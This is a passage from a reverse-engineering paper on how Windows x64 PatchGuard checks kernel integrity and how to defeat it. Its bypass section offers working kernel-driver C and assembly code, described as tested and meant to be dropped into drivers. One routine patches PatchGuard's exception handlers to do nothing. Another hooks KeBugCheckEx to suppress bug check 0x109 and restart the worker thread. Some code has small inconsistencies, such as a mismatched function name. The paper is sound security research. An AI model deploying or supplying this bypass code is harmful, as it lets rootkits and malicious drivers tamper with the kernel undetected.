For now, earmark the fact that a verification routine +has been selected. + +Following the selection of a verification routine, the primary +PatchGuard context is encrypted as described in the previous section. +After the encryption completes, a timer is initialized that makes use of +a sub-context that was allocated early on in the PatchGuard +initialization process by nt!KiInitializePatchGuard. The timer is +initialized through a call to nt!KeInitializeTimer where the pointer to +the timer structure that is passed in is actually part of the +sub-context structure allocated earlier. Immediately following the +initialized timer structure in memory at offset 0x88 is the word value +0x1131. When disassembled, these two bytes translate to a xor [rcx], edx +instruction. If one looks closely at the first two bytes of +nt!CmpAppendDllSection, one will see that its first instruction is +composed of exactly those two bytes. Though not important at this +juncture, it may be of use later. + +With the timer structure initialized, PatchGuard begins the process +of queuing the timer for execution by calling a function that has been +labeled nt!PgInitializeTimer which is prototyped as shown below: + + +VOID PgInitializeTimer( + IN PPATCHGUARD_CONTEXT Context, + IN PVOID EncryptedContext, + IN ULONG64 XorKey, + IN ULONG UnknownZero); + + +Inside the nt!PgInitializeTimer routine, a few strange things occur. +First, a DPC is initialized that uses the randomly selected verification +routine described earlier in this section as the DeferredRoutine. The +EncryptedContext pointer that is passed in as an argument is then XOR'd +with the XorKey argument to produce a completely bogus pointer that is +passed as the DeferredContext argument to nt!KeInitializeDpc. The end +result is pseudo-code that looks something like this: + + +KeInitializeDpc( + &Dpc, + Context->TimerDpcRoutine, + EncryptedContext ^ ~(XorKey << UnknownZero)); + + +After the DPC has been initialized, a call is made to nt!KeSetTimer that +queues the DPC for execution. The DueTime argument is randomly +generated as to make it harder to signature with a defined upper bound +in order to ensure that it is executed within a reasonable time frame. +After setting the timer, nt!PgInitializeTimer returns to the caller. + +With the timer initialized and set to execute, nt!KiInitializePatchGuard +has completed its operation and returns to nt!KiFilterFiberContext. The +divide error fault that caused the whole initialization process to start +is corrected and execution is restored back to the instruction following +the div in nt!KiDivide6432, thus allowing the kernel to boot as normal. + +That's only half of the fun, though. The real question now is how the +validation routine gets executed. It seems obvious that it's related to +the DPC routine that was used when the timer was set, so the most +logical place to look is there. Recalling from earlier in this section, +nt!KiInitializePatchGuard selected a validation routine address from an +array of routines at random. This array is found by looking at this +disassembly from the PatchGuard initialization routine: + + +nt!KiDivide6432+0xec3: +fffff800`01423e74 8bc1 mov eax,ecx +fffff800`01423e76 488d0d83c1bdff lea rcx,[nt] +fffff800`01423e7d 488b84c128044300 mov rax,[rcx+rax*8+0x430428] + + +Again, the same obfuscation technique that was used to hide the pool tag +array is used here. 
By adding 0x430428 to the base address of nt, the
+array of DPC routines is revealed:
+
+
+lkd> dqs nt+0x430428 L3
+fffff800`01430428  fffff800`01033b10 nt!KiScanReadyQueues
+fffff800`01430430  fffff800`011010e0 nt!ExpTimeRefreshDpcRoutine
+fffff800`01430438  fffff800`0101dd10 nt!ExpTimeZoneDpcRoutine
+
+
+This tells us the possible permutations for DPC routines that PatchGuard
+may use, but it doesn't tell us how this actually leads to the
+validation of the protection contexts.  Logically, the next step is to
+attempt to understand how one of these routines operates based on the
+DeferredContext that is passed to it, since it is known, from
+nt!PgInitializeTimer, that the DeferredContext argument will point to
+the PatchGuard context XOR'd with an encryption key.  Of the three
+routines, nt!ExpTimeRefreshDpcRoutine is the easiest to understand.  The
+disassembly of the first few instructions of this function is shown
+below:
+
+
+lkd> u nt!ExpTimeRefreshDpcRoutine
+nt!ExpTimeRefreshDpcRoutine:
+fffff800`011010e0 48894c2408       mov [rsp+0x8],rcx
+fffff800`011010e5 4883ec68         sub rsp,0x68
+fffff800`011010e9 b801000000       mov eax,0x1
+fffff800`011010ee 0fc102           xadd [rdx],eax
+fffff800`011010f1 ffc0             inc eax
+fffff800`011010f3 83f801           cmp eax,0x1
+
+
+Deferred routines are prototyped as taking a pointer to the DPC that
+they are associated with as the first argument and the DeferredContext
+pointer as the second argument.  The x64 calling convention tells us
+that this would equate to rcx pointing to the DPC structure and rdx
+pointing to the DeferredContext pointer.  There's a problem though.  The
+fourth instruction of the function attempts to perform an xadd on the
+first portion of the DeferredContext.  As was stated earlier, the
+DeferredContext that is passed to the DPC routine is the result of an
+XOR operation with a pointer, which produces a completely bogus pointer.
+This should mean that the box would crash immediately upon
+de-referencing the pointer, right?  It's obvious that the answer is no,
+and it's here that another case of misdirection is seen.
+
+The fact of the matter is that nt!ExpTimeRefreshDpcRoutine,
+nt!ExpTimeZoneDpcRoutine, and nt!KiScanReadyQueues are all perfectly
+legitimate routines that have nothing directly to do with PatchGuard at
+all.  Instead, they are used as an indirect means of executing the code
+that does have something to do with PatchGuard.  The unique thing about
+these three routines is that all three de-reference their
+DeferredContext pointer at some point, as shown below:
+
+
+lkd> u fffff800`01033b43 L1
+nt!KiScanReadyQueues+0x33:
+fffff800`01033b43 8b02             mov eax,[rdx]
+lkd> u fffff800`0101dd1e L1
+nt!ExpTimeZoneDpcRoutine+0xe:
+fffff800`0101dd1e 0fc102           xadd [rdx],eax
+
+
+When the de-reference of the bogus DeferredContext occurs, a General
+Protection Fault exception is raised and is passed on to
+nt!KiGeneralProtectionFault.  This routine then eventually leads to the
+execution of the exception handler that is associated with the routine
+that triggered the fault, such as nt!ExpTimeRefreshDpcRoutine.  On x64,
+the exception handling code is completely different from what most
+people are used to on 32-bit.  Rather than functions registering
+exception handlers at runtime, each function specifies its exception
+handlers at compile time in a way that allows them to be looked up
+through a standardized API routine, like nt!RtlLookupFunctionEntry.
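+
+As a point of reference, performing such a lookup from a driver is
+straightforward.  The fragment below is a hedged sketch that relies only
+on the documented behavior of nt!RtlLookupFunctionEntry on x64; error
+handling is kept to a minimum.
+
+
+PCHAR LookupUnwindInfo(
+    IN PVOID CodeAddress,
+    OUT PULONG64 ImageBase)
+{
+    PRUNTIME_FUNCTION Function;
+
+    //
+    // Find the RUNTIME_FUNCTION entry that describes the function
+    // containing the supplied code address.
+    //
+    Function = RtlLookupFunctionEntry(
+        (ULONG64)CodeAddress,
+        ImageBase,
+        NULL);
+
+    if (!Function)
+        return NULL;
+
+    //
+    // UnwindData is an image-relative offset; the exception handler, if
+    // any, is described within the unwind information it points to.
+    //
+    return (PCHAR)(*ImageBase + Function->UnwindData);
+}
+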
This API routine returns information about
+the function in the RUNTIME_FUNCTION structure, which most importantly
+includes unwind information.  The unwind information includes the
+address of the exception handler, if any.  While this is mostly outside
+of the scope of this document, one can determine the address of
+nt!ExpTimeRefreshDpcRoutine's exception handler by doing the following
+in the debugger:
+
+
+lkd> .fnent nt!ExpTimeRefreshDpcRoutine
+Debugger function entry 00000000`01cdaa4c for:
+(fffff800`011010e0)   nt!ExpTimeRefreshDpcRoutine   |
+(fffff800`011011d0)   nt!ExpCenturyDpcRoutine
+Exact matches:
+    nt!ExpTimeRefreshDpcRoutine =
+
+BeginAddress      = 00000000`001010e0
+EndAddress        = 00000000`0010110d
+UnwindInfoAddress = 00000000`00131274
+lkd> u nt + dwo(nt + 00131277 + (by(nt + 00131276) * 2) + 13)
+nt!ExpTimeRefreshDpcRoutine+0x40:
+fffff800`01101120 8bc0             mov eax,eax
+fffff800`01101122 55               push rbp
+fffff800`01101123 4883ec30         sub rsp,0x30
+fffff800`01101127 488bea           mov rbp,rdx
+fffff800`0110112a 48894d50         mov [rbp+0x50],rcx
+
+
+Looking more closely at this exception handler, it can be seen that it
+issues a call to nt!KeBugCheckEx under a certain condition with bug
+check code 0x109.  This bug check code is what is used by PatchGuard to
+indicate that a critical structure has been tampered with, so this is a
+very good indication that this exception handler is, either in whole or
+in part, associated with PatchGuard.
+
+The exception handlers for each of the three routines are roughly
+equivalent and perform the same operations.  If the DeferredContext has
+not been tampered with unexpectedly, then the exception handlers
+eventually call into the protection context's copy of the code from
+INITKDBG, specifically the nt!FsRtlUninitializeSmallMcb symbol.  This
+routine calls into the symbol named nt!FsRtlMdlReadCompleteDevEx which
+is actually what is responsible for calling the various sub-context
+verification routines.
+
+3.5) Reporting Verification Inconsistencies
+
+
+In the event that PatchGuard detects that a critical structure has been
+modified, it calls the code-copy version of the symbol named
+nt!SdbpCheckDll with parameters that will be subsequently passed to
+nt!KeBugCheckEx via the function table stored in the PatchGuard context.
+The purpose of nt!SdbpCheckDll is to zero out the stack and all of the
+registers prior to the current frame before jumping to nt!KeBugCheckEx.
+This is presumably done to attempt to make it impossible for a
+third-party driver to detect and recover from the bug check report.  If
+all of the checks go as planned and there are no inconsistencies, the
+routine creates a new PatchGuard context and sets the timer again using
+the same routine that was selected the first time.
+
+4) Bypass Approaches
+
+
+With the most critical aspects of how PatchGuard operates explained, the
+next goal is to attempt to see if there are any ways in which the
+protection mechanisms offered by it can be bypassed.  This would entail
+either disabling or tricking the validation routine.  While there are
+many obvious approaches, such as creating a custom boot loader that runs
+prior to PatchGuard initializing or modifying ntoskrnl.exe to completely
+exclude the initialization vector, the approaches discussed in this
+chapter are intended to be usable in a real-world environment without
+having to resort to intrusive operations and without requiring a reboot
+of the machine.
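+
+To make the intended usage concrete, the end state resembles the
+hypothetical sketch below, where DisablePatchGuardBypass is simply a
+placeholder name for whichever of the routines developed later in this
+chapter a driver chooses to use.
+
+
+extern NTSTATUS DisablePatchGuardBypass(VOID);
+
+NTSTATUS DriverEntry(
+    IN PDRIVER_OBJECT DriverObject,
+    IN PUNICODE_STRING RegistryPath)
+{
+    NTSTATUS Status;
+
+    UNREFERENCED_PARAMETER(DriverObject);
+    UNREFERENCED_PARAMETER(RegistryPath);
+
+    //
+    // Disable PatchGuard once, up front, before installing any hooks.
+    //
+    Status = DisablePatchGuardBypass();
+
+    if (!NT_SUCCESS(Status))
+        return Status;
+
+    //
+    // ... install SSDT/IDT/MSR hooks just as the driver did on 32-bit
+    // platforms ...
+    //
+
+    return STATUS_SUCCESS;
+}
+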
In fact, the primary goal +is to create a single standalone function, or a few functions, that can +be dropped into device drivers in a manner that allows them to just call +one routine to disable the PatchGuard protections so that the driver's +existing approaches for hooking critical structures can still be used. + +It is important to note that some of the approaches listed here have not +been tested and are simply theoretical. The ones that have been tested +will be indicated as such. Prior to diving into the particular bypass +approaches, though, it is also important to consider general techniques +for disabling PatchGuard on the fly. First, one must consider how the +validation routine is set up to run and what it depends on to accomplish +validation. In this case, the validation routine is set to run in the +context of a timer that is associated with a DPC that runs from a system +worker thread that eventually leads to the calling of an exception +handler. The DPC routine that is used is randomly selected from a small +pool of functions and the timer object is assigned a random DueTime in +an effort to make it harder to detect. + +Aside from the validation vector, it is also known that when PatchGuard +encounters an inconsistency it will call nt!KeBugCheckEx with a specific +bug check code in an attempt to crash the system. These tidbits of +understanding make it possible to consider a wide range of bypass +approaches. + +4.1) Exception Handler Hooking + + +Since it is known that the validation routines indirectly depend on the +exception handlers associated with the three timer DPC routines to run +code, it stands to reason that it may be possible to change the behavior +of each exception handler to simply become a no-operation. This would +mean that once the DPC routine executes and triggers the general +protection fault, the exception handler will get called and will simply +perform no operation rather than doing the validation checks. This +approach has been tested and has been confirmed to work on the current +implementation of PatchGuard. + +The approach taken to accomplish this is to first find the list of +routines that are known to be associated with PatchGuard. As it stands +today, the list only contains three functions, but it may be the case +that the list will change in the future. After locating the array of +routines, each routine's exception handler must be extracted and then +subsequently patched to return 0x1 and then return. An example function +that implements this algorithm can be found below: + + +static CHAR CurrentFakePoolTagArray[] = + "AcpSFileIpFIIrp MutaNtFsNtrfSemaTCPc"; + +NTSTATUS DisablePatchGuard() { + UNICODE_STRING SymbolName; + NTSTATUS Status = STATUS_SUCCESS; + PVOID * DpcRoutines = NULL; + PCHAR NtBaseAddress = NULL; + ULONG Offset; + + RtlInitUnicodeString( + &SymbolName, + L"__C_specific_handler"); + + do + { + // + // Get the base address of nt + // + if (!RtlPcToFileHeader( + MmGetSystemRoutineAddress(&SymbolName), + (PCHAR *)&NtBaseAddress)) + { + Status = STATUS_INVALID_IMAGE_FORMAT; + break; + } + + // + // Search the image to find the first occurrence of: + // + // "AcpSFileIpFIIrp MutaNtFsNtrfSemaTCPc" + // + // This is the fake tag pool array that is used to allocate protection + // contexts. + // + __try + { + for (Offset = 0; + !DpcRoutines; + Offset += 4) + { + // + // If we find a match for the fake pool tag array, the DPC routine + // addresses will immediately follow. 
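+          // (Note: the offset arithmetic below skips the pool tag string,
+          // including its null terminator, plus a few additional bytes;
+          // presumably this padding rounds the offset up to the
+          // pointer-aligned boundary at which the DPC routine array begins.)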
+ // + if (memcmp( + NtBaseAddress + Offset, + CurrentFakePoolTagArray, + sizeof(CurrentFakePoolTagArray) - 1) == 0) + DpcRoutines = (PVOID *)(NtBaseAddress + + Offset + sizeof(CurrentFakePoolTagArray) + 3); + } + + } __except(EXCEPTION_EXECUTE_HANDLER) + { + // + // If an exception occurs, we failed to find it. Time to bail out. + // + Status = GetExceptionCode(); + break; + } + + DebugPrint(("DPC routine array found at %p.", + DpcRoutines)); + + // + // Walk the DPC routine array. + // + for (Offset = 0; + DpcRoutines[Offset] && NT_SUCCESS(Status); + Offset++) + { + PRUNTIME_FUNCTION Function; + ULONG64 ImageBase; + PCHAR UnwindBuffer; + UCHAR CodeCount; + ULONG HandlerOffset; + PCHAR HandlerAddress; + PVOID LockedAddress; + PMDL Mdl; + + // + // If we find no function entry, then go on to the next entry. + // + if ((!(Function = RtlLookupFunctionEntry( + (ULONG64)DpcRoutines[Offset], + &ImageBase, + NULL))) || + (!Function->UnwindData)) + { + Status = STATUS_INVALID_IMAGE_FORMAT; + continue; + } + + // + // Grab the unwind exception handler address if we're able to find one. + // + UnwindBuffer = (PCHAR)(ImageBase + Function->UnwindData); + CodeCount = UnwindBuffer[2]; + + // + // The handler offset is found within the unwind data that is specific + // to the language in question. Specifically, it's +0x10 bytes into + // the structure not including the UNWIND_INFO structure itself and any + // embedded codes (including padding). The calculation below accounts + // for all these and padding. + // + HandlerOffset = *(PULONG)((ULONG64)(UnwindBuffer + 3 + (CodeCount * 2) + 20) & ~3); + + // + // Calculate the full address of the handler to patch. + // + HandlerAddress = (PCHAR)(ImageBase + HandlerOffset); + + DebugPrint(("Exception handler for %p found at %p (unwind %p).", + DpcRoutines[Offset], + HandlerAddress, + UnwindBuffer)); + + // + // Finally, patch the routine to simply return with 1. We'll patch + // with: + // + // 6A01 push byte 0x1 + // 58 pop eax + // C3 ret + // + + // + // Allocate a memory descriptor for the handler's address. + // + if (!(Mdl = MmCreateMdl( + NULL, + (PVOID)HandlerAddress, + 4))) + { + Status = STATUS_INSUFFICIENT_RESOURCES; + continue; + } + + // + // Construct the Mdl and map the pages for kernel-mode access. + // + MmBuildMdlForNonPagedPool( + Mdl); + + if (!(LockedAddress = MmMapLockedPages( + Mdl, + KernelMode))) + { + IoFreeMdl( + Mdl); + + Status = STATUS_ACCESS_VIOLATION; + continue; + } + + // + // Interlocked exchange the instructions we're overwriting with. + // + InterlockedExchange( + (PLONG)LockedAddress, + 0xc358016a); + + // + // Unmap and destroy the MDL + // + MmUnmapLockedPages( + LockedAddress, + Mdl); + + IoFreeMdl( + Mdl); + } + + } while (0); + + return Status; +} + + +The benefits of this approach include the fact that it is small and +relatively simplistic. It is also quite fault tolerant in the event +that something changes. However, some of the cons include the fact that +it depends on the pool tag array being situated immediately prior to the +array of DPC routine addresses and it furthermore depends on the pool +tag array being a fixed value. It's perfectly within the realm of +possibility that Microsoft will eliminate this assumption in the future. +For these reasons, it would be better to not use this approach in a +production driver, but it is at least suitable enough for a +demonstration. + +In order for Microsoft to break this approach they would have to make +some of the assumptions made by it unreliable. 
For instance, the array
+of DPC routines could be moved to a location that is not immediately
+after the array of pool tags.  This would mean that the routine would
+have to hardcode or otherwise derive the array of DPC routines used by
+PatchGuard.  Another option would be to split the pool tag array out
+such that it isn't a condensed string that can be easily searched for.
+In reality, the level of complexity involved in preventing this approach
+from being reliably implemented is quite small.
+
+4.2) KeBugCheckEx Hook
+
+
+One of the unavoidable facts of PatchGuard's protection is that it has
+to report validation inconsistencies in some manner.  In fact, the
+manner in which it reports them has to entail shutting down the machine
+in order to prevent third-party vendors from being able to continue
+running code even after a patch has been detected.  As it stands right
+now, the approach taken to accomplish this is to issue a bug check with
+the symbolic code of 0x109 via nt!KeBugCheckEx.  This route was taken so
+that the end-user would be aware of what had occurred and not be left in
+the dark, literally, if their machine were to all of a sudden shut off
+or reboot without any word of explanation.
+
+The first idea the authors had when thinking about bypass techniques was
+to attempt to have nt!KeBugCheckEx return to the caller's caller frame.
+This would be necessary because one cannot return to the caller itself,
+since the compiler generally inserts a debugger trap immediately after
+calls to nt!KeBugCheckEx.  However, it may have been possible to return
+to the frame of the caller's caller; in other words, the routine that
+called the function that led to nt!KeBugCheckEx being called.  However,
+as described earlier in this document, the PatchGuard code takes care to
+ensure that the stack is zeroed out prior to calling nt!KeBugCheckEx.
+This effectively eliminates any contextual references that might be used
+on the stack for the purpose of returning to parent frames.  As such,
+the nt!KeBugCheckEx hook vector might seem like a dead-end.  Quite the
+contrary, it's not.
+
+A derivative approach that can be taken without having to worry
+about context stored in registers or on the stack is to take advantage
+of the fact that each thread retains the address of its own entry point.
+For system worker threads, the entry point will typically point to a
+routine like nt!ExpWorkerThread.  Since multiple worker threads are
+spawned, the context parameter passed to the thread is irrelevant as the
+worker threads are really only being used to process work items and
+expire DPC routines.  With this fact in mind, the approach boils down to
+hooking nt!KeBugCheckEx and detecting whether or not bug check code
+0x109 has been passed.  If it has not, the original nt!KeBugCheckEx
+routine can be called.  However, if it is 0x109, then the thread can be
+restarted by restoring the calling thread's stack pointer to the top of
+its initial stack minus 8 and then jumping to the thread's StartAddress.
+The end result is that the thread goes back to processing work items and
+expiring DPC routines like normal.
+
+While a more obvious approach would be to simply terminate the calling
+thread, doing so would not be possible.  The operating system keeps
+track of system worker threads and will detect if one exits.  The act of
+a system worker thread exiting will lead to a bluescreen of the system
+-- exactly the type of thing that is trying to be avoided.
+
+The following code implements the algorithm described above.
It is +fairly large for reasons that will be discussed after the snippet: + + +== ext.asm + +.data + +EXTERN OrigKeBugCheckExRestorePointer:PROC +EXTERN KeBugCheckExHookPointer:PROC + +.code + +; +; Points the stack pointer at the supplied argument and returns to the caller. +; +public AdjustStackCallPointer +AdjustStackCallPointer PROC + mov rsp, rcx + xchg r8, rcx + jmp rdx +AdjustStackCallPointer ENDP + +; +; Wraps the overwritten preamble of KeBugCheckEx. +; +public OrigKeBugCheckEx +OrigKeBugCheckEx PROC + mov [rsp+8h], rcx + mov [rsp+10h], rdx + mov [rsp+18h], r8 + lea rax, [OrigKeBugCheckExRestorePointer] + jmp qword ptr [rax] +OrigKeBugCheckEx ENDP + +END + +== antipatch.c + +// +// Both of these routines reference the assembly code described +// above +// +extern VOID OrigKeBugCheckEx( + IN ULONG BugCheckCode, + IN ULONG_PTR BugCheckParameter1, + IN ULONG_PTR BugCheckParameter2, + IN ULONG_PTR BugCheckParameter3, + IN ULONG_PTR BugCheckParameter4); +extern VOID AdjustStackCallPointer( + IN ULONG_PTR NewStackPointer, + IN PVOID StartAddress, + IN PVOID Argument); + +// +// mov eax, ptr +// jmp eax +// +static CHAR HookStub[] = +"\x48\xb8\x41\x41\x41\x41\x41\x41\x41\x41\xff\xe0"; + +// +// The offset into the ETHREAD structure that holds the start routine. +// +static ULONG ThreadStartRoutineOffset = 0; + +// +// The pointer into KeBugCheckEx after what has been overwritten by the hook. +// +PVOID OrigKeBugCheckExRestorePointer; + +VOID KeBugCheckExHook( + IN ULONG BugCheckCode, + IN ULONG_PTR BugCheckParameter1, + IN ULONG_PTR BugCheckParameter2, + IN ULONG_PTR BugCheckParameter3, + IN ULONG_PTR BugCheckParameter4) +{ + PUCHAR LockedAddress; + PCHAR ReturnAddress; + PMDL Mdl = NULL; + + + // + // Call the real KeBugCheckEx if this isn't the bug check code we're looking + // for. + // + if (BugCheckCode != 0x109) + { + DebugPrint(("Passing through bug check %.4x to %p.", + BugCheckCode, + OrigKeBugCheckEx)); + + OrigKeBugCheckEx( + BugCheckCode, + BugCheckParameter1, + BugCheckParameter2, + BugCheckParameter3, + BugCheckParameter4); + } + else + { + PCHAR CurrentThread = (PCHAR)PsGetCurrentThread(); + PVOID StartRoutine = *(PVOID **)(CurrentThread + ThreadStartRoutineOffset); + PVOID StackPointer = IoGetInitialStack(); + + DebugPrint(("Restarting the current worker thread %p at %p (SP=%p, off=%lu).", + PsGetCurrentThread(), + StartRoutine, + StackPointer, + ThreadStartRoutineOffset)); + + // + // Shift the stack pointer back to its initial value and call the routine. We + // subtract eight to ensure that the stack is aligned properly as thread + // entry point routines would expect. + // + AdjustStackCallPointer( + (ULONG_PTR)StackPointer - 0x8, + StartRoutine, + NULL); + } + + // + // In either case, we should never get here. + // + __debugbreak(); +} + +VOID DisablePatchProtectionSystemThreadRoutine( + IN PVOID Nothing) +{ + UNICODE_STRING SymbolName; + NTSTATUS Status = STATUS_SUCCESS; + PUCHAR LockedAddress; + PUCHAR CurrentThread = (PUCHAR)PsGetCurrentThread(); + PCHAR KeBugCheckExSymbol; + PMDL Mdl = NULL; + + + RtlInitUnicodeString( + &SymbolName, + L"KeBugCheckEx"); + + do + { + // + // Find the thread's start routine offset. 
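+      // (The loop below scans the current thread's ETHREAD for a field that
+      // matches this routine's own address; since this system thread was
+      // created with a known start routine, the matching offset is that of
+      // the thread's start address field, which the KeBugCheckEx hook later
+      // uses when restarting a worker thread.)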
+ // + for (ThreadStartRoutineOffset = 0; + ThreadStartRoutineOffset < 0x1000; + ThreadStartRoutineOffset += 4) + { + if (*(PVOID **)(CurrentThread + + ThreadStartRoutineOffset) == (PVOID)DisablePatchProtection2SystemThreadRoutine) + break; + } + + DebugPrint(("Thread start routine offset is 0x%.4x.", + ThreadStartRoutineOffset)); + + // + // If we failed to find the start routine offset for some strange reason, + // then return not supported. + // + if (ThreadStartRoutineOffset >= 0x1000) + { + Status = STATUS_NOT_SUPPORTED; + break; + } + + // + // Get the address of KeBugCheckEx. + // + if (!(KeBugCheckExSymbol = MmGetSystemRoutineAddress( + &SymbolName))) + { + Status = STATUS_PROCEDURE_NOT_FOUND; + break; + } + + // + // Calculate the restoration pointer. + // + OrigKeBugCheckExRestorePointer = (PVOID)(KeBugCheckExSymbol + 0xf); + + // + // Create an initialize the MDL. + // + if (!(Mdl = MmCreateMdl( + NULL, + (PVOID)KeBugCheckExSymbol, + 0xf))) + { + Status = STATUS_INSUFFICIENT_RESOURCES; + break; + } + + MmBuildMdlForNonPagedPool( + Mdl); + + // + // Probe & Lock. + // + if (!(LockedAddress = (PUCHAR)MmMapLockedPages( + Mdl, + KernelMode))) + { + IoFreeMdl( + Mdl); + + Status = STATUS_ACCESS_VIOLATION; + break; + } + + // + // Set the aboslute address to our hook. + // + *(PULONG64)(HookStub + 0x2) = (ULONG64)KeBugCheckExHook; + + DebugPrint(("Copying hook stub to %p from %p (Symbol %p).", + LockedAddress, + HookStub, + KeBugCheckExSymbol)); + + // + // Copy the relative jmp into the hook routine. + // + RtlCopyMemory( + LockedAddress, + HookStub, + 0xf); + + // + // Cleanup the MDL. + // + MmUnmapLockedPages( + LockedAddress, + Mdl); + + IoFreeMdl( + Mdl); + + } while (0); +} + +// +// A pointer to KeBugCheckExHook +// +PVOID KeBugCheckExHookPointer = KeBugCheckExHook; + +NTSTATUS DisablePatchProtection() { + OBJECT_ATTRIBUTES Attributes; + NTSTATUS Status; + HANDLE ThreadHandle = NULL; + + InitializeObjectAttributes( + &Attributes, + NULL, + OBJ_KERNEL_HANDLE, + NULL, + NULL); + + // + // Create the system worker thread so that we can automatically find the + // offset inside the ETHREAD structure to the thread's start routine. + // + Status = PsCreateSystemThread( + &ThreadHandle, + THREAD_ALL_ACCESS, + &Attributes, + NULL, + NULL, + DisablePatchProtectionSystemThreadRoutine, + NULL); + + if (ThreadHandle) + ZwClose( + ThreadHandle); + + return Status; +} + + +This approach has been tested and has been confirmed to work against +the current version of PatchGuard at the time of this writing. The +benefits that this approach has over others is that it does not rely +on any un-exported dependencies or signatures, it has zero +performance overhead since nt!KeBugCheckEx is never called +unless the machine is going to crash, and it is not subject to race +conditions. The only major con that it has that the authors are +aware of is that it depends on the behavior of the system worker +threads staying the same with regard to the fact that it is safe to +restore execution to the entry point of the thread with a +NULL context. It is assumed, so far, that this will +continue to be a safe bet. + +In order to eliminate this approach as a possible bypass technique, +Microsoft could do one of a few things. First, they could create a new +protection sub-context that stores a checksum of nt!KeBugCheckEx and the +functions that it calls. In the event that it is detected that +nt!KeBugCheckEx has been tampered with, PatchGuard could do a hard +reboot without calling any external functions. 
While this is a less +desired behavior, it appears to be one of the few ways in which +Microsoft could reliably solve this. Any other approach that relied on +the calling of an external function that could be found at a +deterministic address would present an opportunity for a similar bypass +technique. + +A second, less useful approach would be to zero out some of the fields +in the thread structure prior to calling nt!KeBugCheckEx. While this +would prevent the above described approach from working, it would +certainly not prevent another, perhaps more or less hackish approach +from working. All that's required is the ability to return the worker +thread to its normal operation of processing queued work items. + +4.3) Finding the Timer + + +A theoretical approach that has not been tested that could be used to +disable PatchGuard would involve using some heuristic algorithm to +locate the timer context associated with PatchGuard. To develop such an +algorithm, it is necessary to take into account what is known about the +way the timer DPC routine is set up. First, it is known that the +DeferredRoutine associated with the DPC will point to one of +nt!KiScanReadyQueues, nt!ExpTimeRefreshDpcRoutine, or +nt!ExpTimeZoneDpcRoutine. Unfortunately, the addresses associated with +these routines cannot be directly determined since they are not +exported, but regardless, this knowledge could be of use. The second +thing that is known is that the DeferredContext associated with the DPC +will be set to an invalid pointer. It is also known that at offset 0x88 +from the start of the timer structure is the word 0x1131. Given +sufficient research, it is also likely that other contextual references +could be found in relation to the timer that would provide enough data +to deterministically identify the PatchGuard timer. + +However, the problem is finding a way able to enumerate timers in the +first place. In this case, the un-exported address of the timer list +would have to be extracted in order to be able to enumerate all of the +active timers. While there are some indirect methods through which this +information could be extracted, such as by disassembling some functions +that make reference to it, the mere fact of depending on some method of +locating un-exported symbols is something that will likely lead to +unstable code. + +Another option that would not require the location of un-exported +symbols would be to find some mechanism by which the address space can +be searched, starting at nt!MmNonPagedPoolStart, using the heuristic +matching requirements described above. Given the right set of +parameters for the search, it seems likely that it would be possible to +reliably and deterministically locate the timer structure. However, +there is certainly a race condition waiting to happen under this model +given that the timer routine could be dispatched immediately after +locating it but prior to canceling it. To surmount this, the thread +doing the searching would need to raise to a higher IRQL and possibly +disable other processors during the time that it is doing its search. + +Regardless, given the ability to locate the timer structure, it should +be as simple as calling nt!KeCancelTimer to abort the PatchGuard +verification routine and disable it entirely. If possible, such an +approach would be very optimal because it would require no patching of +code. + +If such a technique were to be proven feasible, Microsoft would have to +do one of two things to break it. 
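+
+Before considering those countermeasures, the fragment below gives a
+rough idea of what such a heuristic search might look like.  It is an
+untested sketch: the search bounds and the addresses of the three
+suspect DPC routines are assumed to be supplied by the caller, the
+0x88/0x1131 signature comes from the observations made earlier, and the
+synchronization concerns mentioned above (raising IRQL and stalling the
+other processors) are ignored for brevity.
+
+
+PKTIMER FindSuspectTimer(
+    IN PCHAR SearchStart,
+    IN PCHAR SearchEnd,
+    IN PVOID *SuspectDpcRoutines,
+    IN ULONG SuspectDpcRoutineCount)
+{
+    PCHAR Address;
+    ULONG Index;
+
+    for (Address = SearchStart; Address < SearchEnd; Address += 8)
+    {
+        PKTIMER Timer = (PKTIMER)Address;
+        PKDPC   Dpc;
+
+        //
+        // Skip candidates whose memory is not resident, then check for the
+        // 0x1131 word that is known to follow the timer at offset 0x88.
+        //
+        if (!MmIsAddressValid(Address) ||
+            !MmIsAddressValid(Address + 0x88))
+            continue;
+
+        if (*(PUSHORT)(Address + 0x88) != 0x1131)
+            continue;
+
+        //
+        // The timer's DPC should reference one of the known DPC routines.
+        //
+        Dpc = Timer->Dpc;
+
+        if (!MmIsAddressValid(Dpc))
+            continue;
+
+        for (Index = 0; Index < SuspectDpcRoutineCount; Index++)
+        {
+            if ((PVOID)Dpc->DeferredRoutine == SuspectDpcRoutines[Index])
+                return Timer;
+        }
+    }
+
+    return NULL;
+}
+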
First, they could identify the +matching criteria being used by drivers and ensure that the assumptions +made are no longer safe, thus making it impossible to locate the timer +structure using the existing set of matching parameters. Alternatively, +Microsoft could change the mechanism by which the PatchGuard +verification routine is executed such that it does not make use of a +timer DPC routine. The latter is most likely less preferable than the +former as it would require a relatively significant redesign and +reconsideration of the techniques used to misdirect and obfuscate the +PatchGuard verification phase. + +4.4) Hybrid Interception + + +Of the techniques listed so far, the approaches taken to disable or +otherwise prevent PatchGuard from operating as normal rely on two basic +points of interception. In the case of the exception handler hooking +approach, PatchGuard is subverted by preventing the actual verification +routines from running. This point of interception can be seen as a +before-the-fact approach. In the case of the nt!KeBugCheckEx hook, +PatchGuard is subverted by preventing the reporting of the error that is +associated with a critical structure modification being detected. This +point of interception can be seen as an after-the-fact approach. A +theoretical approach would be to combine the two concepts in a way that +allows for more deterministic and complete detection of the execution of +PatchGuard's verification routines. + +One possible example of this type of approach would be to generalize the +hooking of the exception handlers that are associated with the timer DPC +routines that PatchGuard uses to the central entry point for C-style +exceptions. This routine is named nt!__C_specific_handler and it is an +exported symbol, making it quite useful if it can be harnessed. By +hooking this routine, information about exceptions could be tracked and +filtered for referencing after-the-fact information, as necessary, to +determine that PatchGuard is running. + +4.5) Simulated Hot Patching + + +The documentation associated with PatchGuard states that it still allows +the operating system to be hot-patched through their runtime patching +API. For this reason, it should be possible to simulate a hot-patch +that would appear to PatchGuard as having been legitimate. At the time +of this writing, the authors have not taken the time to understand the +manner in which this could be accomplished, but it is left open to +further research. Assuming an approach was found that allowed this +technique to work reliably, it stands to reason that doing so would be +the most preferred route because it would be making use of a documented +approach for the circumvention of PatchGuard. + +5) Conclusion + + +The development of a solution that is intended to mitigate the +unauthorized modification of various critical portions of the kernel can +be seen as a rather daunting task, especially when considering the need +to ensure that the routines actually used for the validation of the +kernel cannot be tampered with. This document has shown how Microsoft +has approached the problem with their PatchGuard implementation on +x64-based versions of the Windows kernel. 